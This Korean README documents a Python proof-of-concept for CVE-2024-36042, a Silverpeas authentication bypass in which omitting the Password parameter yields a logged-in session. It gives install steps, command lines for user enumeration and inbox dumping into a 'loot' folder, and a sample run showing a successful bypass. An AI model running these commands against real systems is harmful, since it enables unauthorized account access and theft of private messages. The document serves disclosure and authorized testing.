
Silverpeas < 6.3.5에서 CVE-2024-36042 인증 우회를 위한 Python PoC. 버전 감지, 멀티스레드 사용자 열거, 메시지 추출 및 승인된 보안 테스트를 위한 구조화된 보고 기능을 제공합니다.
CVE-2024-36042에 대한 깔끔하고 전문적인 Python3 개념 증명 — Silverpeas < 6.3.5에서
AuthenticationServlet의 비밀번호 검증 누락으로 인한 인증 우회.
Silverpeas AuthenticationServlet은 POST 본문에서 Password 매개변수가 생략되어도 로그인 요청을 수락하여 알려진 사용자 이름에 대해 인증된 세션 접근을 부여합니다. 이 도구는 모듈식 스레드 기반 익스플로잇 프레임워크를 통해 취약점을 책임감 있게 시연하며, 고급 정찰, 데이터 추출 및 전문 보고서 생성을 제공합니다.
영향: Silverpeas < 6.3.5
CVE: CVE-2024-36042
GHSA: GHSA-qvh3-8c57-gp4m
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4
python3 CVE-2024-36042.py -t http://TARGET:8080 --dump-messages
python3 CVE-2024-36042.py -t http://TARGET:8080 -u admin --dump-messages --message-output both
python3 CVE-2024-36042.py -t http://TARGET:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./loot
python3 CVE-2024-36042.py -t http://TARGET:8080 --check-version --no-exploit
python3 CVE-2024-36042.py -t http://TARGET:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html
이 도구는 --message-output를 통해 덤프된 메시지에 대해 네 가지 기본 출력 모드를 지원합니다:
console (기본값): 키워드 강조와 함께 정리된 메시지를 터미널에 직접 출력합니다.markdown: 출력 디렉터리에 계정당 하나의 {username}_messages.md 보고서를 생성합니다.files: 계정별 폴더를 만들고 각 메시지를 개별 파일(예: message_0006.md)로 저장하며, 파일 시스템 정렬을 위해 0으로 채워진 ID를 사용합니다.both: console과 markdown 모드를 결합합니다.outdir/
├── SilverAdmin/
│ ├── message_0001.md
│ ├── message_0002.md
│ ├── raw/ (선택 사항: --save-raw-html)
│ │ └── msg_1.html
│ └── session_cookies.txt
├── scr1ptkiddy/
│ ├── messages.md
│ └── session_cookies.txt
└── summary.json
-t, --target Silverpeas의 기본 URL (필수)
-u, --user 단일 사용자 이름 타겟팅
--userlist 한 줄에 하나의 사용자 이름이 있는 파일
--dump-messages 받은 편지함 메시지 스크래핑 및 표시
--max-id 확인할 최대 메시지 ID (기본값: 50)
--threads 동시 작업자 수 (기본값: 5)
--proxy HTTP 프록시 URL
--message-output 출력 모드: {console, markdown, files, both}
--output-format 파일 형식: {md, txt}
--json 전체 JSON 보고서 내보내기
--csv 스크래핑된 메시지 CSV 내보내기
--outdir 내보내기 출력 디렉터리
--no-color ANSI 색상 출력 비활성화 (로그에 유용)
--save-raw-html 디버깅을 위해 원시 HTML 응답 저장
--check-version 버전만 식별
--no-exploit 익스플로잇 건너뛰기 (--check-version과 함께 사용)
--quiet, -q 최소 출력
--no-banner 배너 표시 안 함
[*] 대상 : http://10.49.169.44:8080
[*] 버전 : 6.3.1
[+] 버전 6.3.1 < 6.3.5 - 취약함.
[*] 시도 중: scr1ptkiddy
[+] 우회 성공 -> scr1ptkiddy
[+] 데이터 저장됨: ./scr1ptkiddy
────────────────────────────────────────────────────────────────────
실행 요약
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ 계정 │ 상태 │ 메시지 │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy │ 성공 │ 6 │
│ admin │ 실패 │ 0 │
└───────────────┴──────────┴──────────┘
[+] JSON 보고서 -> ./report_20260516_013210.json
이 저장소는 제 오펜시브 보안 포트폴리오의 일부입니다. 다음을 입증합니다:
이 도구는 승인된 보안 테스트, 연구 및 교육 목적으로만 제공됩니다. 허가되지 않은 컴퓨터 시스템 접근은 불법입니다. 소유하지 않은 인프라를 테스트하기 전에 항상 명시적인 허가를 받으십시오.
MIT
| 기능 | 설명 |
|---|
| 버전 감지 | 익스플로잇 전에 Silverpeas 버전 및 취약점 상태를 식별합니다. |
| 멀티스레드 | ThreadPoolExecutor를 통한 동시 사용자 열거 및 스레드 안전 출력. |
| 고급 발견 | 다국어(영어/프랑스어) 엔드포인트 탐색 및 다중 ID 프로빙. |
| 데이터 추출 | 중복 제거 및 상용구 필터링이 포함된 고충실도 메시지 덤프. |
| 유연한 출력 | 콘솔, 마크다운 보고서 및 개별 파일 내보내기(.md 또는 .txt) 지원. |
| 프록시 및 디버깅 | Burp/ZAP을 통한 라우팅(--proxy) 및 파서 디버깅을 위한 원시 HTML 저장. |
| 깔끔한 UX | ASCII 요약 테이블, 키워드 강조 및 선택적 ANSI 색상 제어. |